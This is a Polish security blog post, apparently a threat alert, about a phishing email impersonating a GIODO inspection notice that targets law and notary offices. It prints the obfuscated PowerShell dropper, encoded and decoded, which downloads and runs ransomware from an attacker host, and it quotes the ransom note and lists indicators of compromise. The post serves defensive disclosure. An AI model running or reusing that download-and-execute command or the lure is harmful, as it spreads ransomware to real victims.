Uwaga na wiadomość podszywającą się pod komunikat o kontroli GIODO

dodał 23 czerwca 2017 o 17:54 w kategorii Złośniki  z tagami:
Uwaga na wiadomość podszywającą się pod komunikat o kontroli GIODO

Trzeba przyznać, że dawno nie było ataku na adwokatów i notariuszy. Dzisiaj około godziny 15 do skrzynek kancelarii adwokackich i notarialnych w całej Polsce zaczęły przychodzić wiadomości podszywające się pod komunikat o kontroli GIODO.

Kancelarie adwokackie i notarialne były swojego czasu bardzo popularnym celem przestępców – zapewne internetowi złoczyńcy byli skuszeni wizją bogactw, które rzekomo owe kancelarie posiadają. Od dłuższego czasu nie widzieliśmy ataków wycelowanych w tę kategorię odbiorców, ale najwyraźniej właśnie do nich doszło.

Złośliwa wiadomość

Niebezpieczna wiadomość nosi tytuł Powiadomienie o planowanej kontroli GIODO w państwa Kancelarii i nie licząc logo GIODO oraz podpisu w formie standardowej stopki nie zawiera żadnej dodatkowej treści. Wygląda tak:

Nadawcą jest adres

kanelaria@giodo.gov.pl

Ciekawsze rzeczy zaczynają się dziać w załączniku. Plik o nazwie

Powiadomienie o planowanej kontroli GIODO.PDF.zip

zawiera folder

Powiadomienie o kontroli

oraz plik

Hasło do powiadomienia o kontroli.txt

o zawartości

Hasło do powiadomienia : DouME7+23cs

Folder zawiera plik

Powiadomienie o kontroli GIODO.rar

zabezpieczony hasłem. W nim z kolei znajduje się folder

Powiadomienie o kontroli

a w nim plik

Powiadomienie o planowanej kontroli GIODO_PDF.vbs

Plik VBS jest odrobinę zaciemniony i wywołuje polecenie PowerShella o treści

POwersHELl.Exe -EXEcUTionPOlicY byPaSs -wINDOWSTyLE HIdDeN -encOdEdCOmMaND IAAgACAAIAAgAHMARQBUAC0AYwBvAG4AVABlAG4AVAAgACAAIAAgACAALQBWAEEAbABVAGUAIAAgACAAIAAgACgAbgBlAFcALQBPAGIAagBFAEMAdAAgAFMAeQBTAHQARQBNAC4ATgBlAFQALgBXAEUAQgBDAEwAaQBFAE4AVAApAC4ARABPAFcAbgBMAE8AQQBEAEQAQQBUAGEAKAAgACAAIAAgACAAHSBoAHQAdABwADoALwAvAGEAZABtAGkAbgBlAHgALgBuAHMAdQBwAGQAYQB0AGUALgBpAG4AZgBvAC8AMQA1ADAAMAAvAHMANQAwADAALgBlAHgAZQAdICAAIAAgACAAIAApACAAIAAgACAAIAAtAEUAbgBjAG8ARABJAE4ARwAgACAAIAAgACAAYgB5AFQARQAgACAAIAAgACAALQBQAGEAVABoACAAIAAgACAAIAAdICQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAawB3AHMAbABrADYALgBlAHgAZQAdICAAIAAgACAAIAA7ACAAIAAgACAAIABTAFQAYQBSAHQALQBQAFIATwBjAGUAcwBzACAAIAAgACAAIAAdICQARQBuAHYAOgBhAFAAcABEAGEAdABhAFwAawB3AHMAbABrADYALgBlAHgAZQAdIA==

Odkodowanie pozwala na ujawnienie poniższej treści:

 sET-conTenT -VAlUe (neW-ObjECt SyStEM.NeT.WEBCLiENT).DOWnLOADDATa(  http://adminex.nsupdate.info/1500/s500.exe ) -EncoDING byTE -PaTh  $env:appdata\kwslk6.exe ; STaRt-PROcess  $Env:aPpData\kwslk6.exe

Jego funkcja to pobranie i uruchomienie pliku EXE ze ścieżki wymienionej powyżej.

Plik EXE

Jeśli niezwykle skomplikowany system pakowania pliku docelowego coś Wam przypomina, to pewnie słusznie. W końcowym pliku EXE znajduje się bowiem Polski Ransomware / Vortex/ Flotera. Fragment notatki o okupie wygląda następująco:

Masz problem ze znalezieniem potrzebnych danych? Nie możesz otworzyć swoich plikow?
Wszystkie istotne pliki zostały zaszyfrowane!
Aby odzyskać pliki skontaktuj się z nami pod adresem: 3NIGMA@0.PL lub 3NIGMA2@PROTONMAIL.COM
Odszyfrowac Twoje pliki mozna tylko przy pomocy dedykowanego programu deszyfrującego, wraz z jednorazowym kluczem wygenerowanym unikalnie dla Ciebie!
Dwa pliki odszyfrujemy bez opłaty za pozostałe będziecie Państwo musieli zapłacić 200$
Radzimy decydować się szybko, 72 godziny od zaszyfrowania opłata zostanie podniesiona do 400$.

Sam ransomware wykonuje między innymi połączenia do serwera:

https://tanie-wino.pila.pl/pass/

z którego pobiera klucz do szyfrowania danych,

api.ipify.org

z którego pobiera aktualny adres IP oraz

http://vokalia.nsupdate.info/mi5/<br>https://tanie-wino.pila.pl/mi5/

prawdopodobnie serwerów C&C. Zawiera także ścieżkę

C:\FRST\AESxWin-master\AESxWin\obj\Debug\pg_ctl.pdb

Po uruchomieniu wyświetla taki komunikat:

Dostaliście tego emaila?

Jeśli otrzymaliście opisywaną powyżej wiadomość, skontaktujcie się z nami – mamy do Was sprawę.

Istotne informacje

Nagłówki wiadomości:

Received: from [10.2.146.8] (unknown [89.249.74.188])
Received: from aog172.rev.netart.pl (aog172.rev.netart.pl. [85.128.241.172])

 

Domeny powiązane z atakiem:

tanie-wino.pila.pl (schowany za CloudFlare)
vokalia.nsupdate.info (198.27.74.25, OVH)
adminex.nsupdate.info (94.152.46.207, KEI)

Pliki powiązane z atakiem:

s500.exe 
SHA1: 1632221598aca42d1009aa6f377789e84c9f2e0d
https://www.virustotal.com/pl/file/9037aeca65810ae9eb127c38c586f56501ce07c41e24141571a1d08d62714948/analysis/1498228743/
https://www.hybrid-analysis.com/sample/9037aeca65810ae9eb127c38c586f56501ce07c41e24141571a1d08d62714948?environmentId=100

Powiadomienie o planowanej kontroli GIODO.PDF.zip
SHA1: 5e9cf6f662700f686458767ff4afb9bf0a909629
https://www.virustotal.com/pl/file/d07ef75400c4d53699ac7593ff6d60c10681dfbf8f4c51539bb8adec59aff6ec/analysis/

Powiadomienie o planowanej kontroli GIODO_PDF.vbs
SHA1: 05d067877f27bd0e411e565b6f0990e49697c6d4
https://www.virustotal.com/pl/file/e24feddf1abdbcab875213e374fabab71851e334bde1cbd60c888c71f642dfb9/analysis/1498232795/

Dziękujemy Czytelnikom którzy zgłosili wiadomości oraz Anonimowym Analitykom którzy je szybko i anonimowo przeanalizowali.